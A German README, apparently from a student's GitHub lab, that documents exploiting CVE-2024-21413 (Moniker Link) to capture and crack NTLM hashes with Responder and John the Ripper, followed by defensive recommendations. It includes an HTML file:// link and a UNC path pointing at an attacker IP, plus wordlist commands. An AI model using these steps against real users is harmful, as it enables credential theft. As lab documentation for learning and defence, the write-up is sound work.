Moniker Link Lab-Einrichtung - CVE-2024-21413
🎯 Projektübersicht
Praxisorientiertes Penetration-Testing-Labor, das die Ausnutzung von Moniker Links (CVE-2024-21413) zur NTLM-Anmeldeinformationsgewinnung demonstriert. Dieses Projekt dokumentiert die vollständige Angriffskette von der Einrichtung bis zur Kompromittierung von Anmeldeinformationen, einschließlich realer Herausforderungen und Lösungen.
Wichtigste Errungenschaft: Der Moniker-Link-Angriff wurde sowohl in einer isolierten Laborumgebung (Windows-10-VM) als auch auf einem realen System (Windows-11-PC) erfolgreich ausgeführt, was praktische Sicherheitslücken und defensive Gegenmaßnahmen demonstriert.
🏗️ Laborarchitektur
Infrastruktur
Angriffsmaschine:
- Plattform: Kali Linux 2024
- Netzwerk (Host-Only): 192.168.56.101
- Netzwerk (Bridged): 192.168.1.117
- Primäres Werkzeug: Responder 3.1.6.0
Zielsysteme:
- Windows 10 VM: 192.168.56.104 (Isolierte Testumgebung)
- Windows 11 PC: 192.168.1.178 (Validierung in realer Umgebung)
Netzwerkkonfiguration:
- VirtualBox-Host-Only-Adapter (VM-Tests)
- VirtualBox-Bridge-Adapter (Tests mit echtem PC)
- Isoliert von Produktionsnetzwerken
⚔️ Angriffsausführung
Angriffsablauf
- Responder auf Kali bereitstellen, um auf NTLM-Authentifizierung zu lauschen
- Bösartigen Link erstellen mithilfe des file://-Protokolls, der auf die IP des Angreifers zeigt
- Authentifizierung auslösen über einen UNC-Pfad im Datei-Explorer
- NetNTLMv2-Hash erfassen, wenn das Opfer eine Verbindung versucht
- Passwort knacken mit John the Ripper
Einfacher Angriffsvektor
HTML-Datei (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
Datei-Explorer-Methode:
- Benutzer gibt
\\192.168.56.101\test in die Adressleiste ein
- Windows versucht eine SMB-Verbindung
- NTLM-Hash wird automatisch gesendet (oder Aufforderung zur Eingabe von Anmeldeinformationen)
- Responder erfasst die Authentifizierung
🚧 Herausforderungen & Lösungen
Herausforderung 1: Windows-Firewall blockiert Verbindungen (Windows 11 PC)
Problem:
- Windows-11-PC konnte von Kali aus nicht angepingt werden
- SMB-Verbindungsversuche schlugen fehl
- Angriff vollständig blockiert
Ursache:
- Windows-Firewall standardmäßig aktiviert
- Blockiert eingehende SMB-Verbindungen von externen IPs
Lösung:
- Windows-Firewall für Tests vorübergehend deaktiviert
- Verbindung sofort erfolgreich
- Hash erfolgreich erfasst
Lehre: Die standardmäßige Windows-Firewall bietet effektiven Schutz gegen diesen Angriff. Benutzer müssen sie aktiviert lassen.
Herausforderung 2: Zwischengespeicherte Ergebnisse in John the Ripper (Windows 10 VM)
Problem:
- Ursprüngliches Windows-10-Passwort:
nwigwecj1
- John zeigte:
12Honey (falsches Passwort!)
12Honey stammte aus einem früheren Test
Ursache:
- John speichert geknackte Passwörter in
~/.john/john.pot
- Alter Hash aus früherer Sitzung
- Zeigte zwischengespeichertes Ergebnis statt des aktuellen Passworts
Lösung:
- Windows-10-VM-Passwort auf
1414 geändert
- Neuen Hash erfasst
- Benutzerdefinierte Wortliste mit wahrscheinlichen Passwörtern erstellt
- Mit neuer Wortliste erfolgreich geknackt
Lehre: Immer überprüfen, dass man den richtigen Hash knackt. Pot-Datei löschen oder eindeutige Passwörter für Tests verwenden.
Herausforderung 3: Passwort nicht in rockyou.txt
Problem:
- Passwort
1414 in rockyou.txt nicht gefunden (14 Millionen Passwörter)
- Generischer Wortlistenangriff schlug fehl
Ursache:
- rockyou.txt enthält nicht jede mögliche 4-stellige Kombination
- Einfache numerische Sequenzen fehlen oft in gängigen Wortlisten
Lösung:
- Gezielte benutzerdefinierte Wortliste basierend auf gängigen Mustern erstellt:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Mit benutzerdefinierter Wortliste sofort geknackt
Lehre: „Nicht in rockyou.txt" ≠ sicher. Kurze Passwörter sind anfällig für gezielte Angriffe und Brute-Force-Angriffe, unabhängig vom Vorhandensein in Wortlisten.
📊 Ergebnisse
Windows 10 VM (kontrollierte Umgebung)
Windows 11 PC (reales System)
🛡️ Sicherheitsanalyse
Was funktioniert hat (Verteidigung)
✅ Windows-Firewall - Hat den Angriff bei Aktivierung vollständig blockiert
✅ Moderne Browser - Chrome/Edge blockieren Remote-file://-Links
✅ Benutzerbewusstsein - Manuelle Aufforderung erfordert eine Benutzeraktion
Was versagt hat (Schwachstellen)
❌ Schwache Passwörter - 4-stellige Ziffern leicht zu knacken
❌ Deaktivierte Firewall - Häufiger Benutzerfehler
❌ Datei-Explorer - Keine Warnung vor UNC-Pfaden
❌ NTLM-Protokoll - Automatische Authentifizierung gegenüber SMB-Freigaben
Wichtigste Erkenntnisse
1. Firewall ist entscheidend
- Die standardmäßige Windows-Firewall blockiert diesen Angriff
- ~30–40 % der Benutzer deaktivieren sie dauerhaft
- Unternehmensnetzwerke erlauben oft internes SMB
2. Illusion der Passwortstärke
1414 nicht in rockyou.txt (erscheint „stark")
- Mit gezielter Wortliste sofort geknackt
- Kurze Passwörter bieten keinerlei Sicherheit
3. Benutzerinteraktion erforderlich
- Moderne Sicherheit erfordert, dass der Benutzer den UNC-Pfad einfügt
- Social Engineering bleibt eine entscheidende Komponente
- Technischer Exploit allein reicht nicht aus
🔧 Verwendete Werkzeuge
Offensiv:
- Responder 3.1.6.0 (NTLM-Hash-Erfassung)
- John the Ripper (Passwortknacken)
- Erstellung benutzerdefinierter Wortlisten
- Einfache HTML-Datei
Infrastruktur:
- VirtualBox 7.0 (Virtualisierung)
- Kali Linux 2024 (Angriffsplattform)
- Windows 10 Enterprise (Testziel)
- Windows 11 Pro (Validierung in realer Umgebung)
📁 Repository-Struktur
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
🎓 Demonstrierte Fähigkeiten
Technisch:
- Netzwerkprotokollanalyse (SMB, NTLM)
- Penetration-Testing-Methodik
- Passwortknack-Techniken
- Virtuelle Laborinfrastruktur
- Firewall-Fehlerbehebung
Beruflich:
- Technische Dokumentation
- Problemlösung unter Einschränkungen
- Sicherheitsbewertung
- Risikoanalyse
- Ethische Testpraktiken
🔒 Defensive Empfehlungen
Für Benutzer
- ✅ Windows-Firewall aktiviert lassen
- ✅ Niemals UNC-Pfade aus E-Mails einfügen
- ✅ Starke Passwörter verwenden (15+ Zeichen)
- ✅ Absender überprüfen, bevor auf Dateifreigaben zugegriffen wird
Für Organisationen
- ✅ Ausgehendes SMB (Port 445) an der Netzwerk-Firewall blockieren
- ✅ NTLM deaktivieren, Kerberos durchsetzen
- ✅ SMB-Verbindungen zu externen IPs überwachen
- ✅ E-Mail-Gateway-Filterung (file://-Links entfernen)
- ✅ Schulungen zum Sicherheitsbewusstsein
- ✅ Richtlinien für Passwortkomplexität
⚠️ Ethische Offenlegung
Alle Tests wurden an autorisierten Systemen durchgeführt:
- Nur persönliche Laborinfrastruktur
- Isolierte virtuelle Netzwerke
- Eigene Geräte und Konten
- Bildungszweck
Rechtlicher Hinweis: Unbefugter Computerzugriff ist illegal. Dieses Projekt dient nur Bildungszwecken und autorisierten Testumgebungen.
📚 Referenzen
📞 Kontakt
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
Datum: März 2026
📄 Lizenz
Nur für Bildungszwecke. Nicht für unbefugte Tests.
⭐ Wenn Ihnen dieses Projekt geholfen hat, erwägen Sie bitte, dem Repository einen Stern zu geben!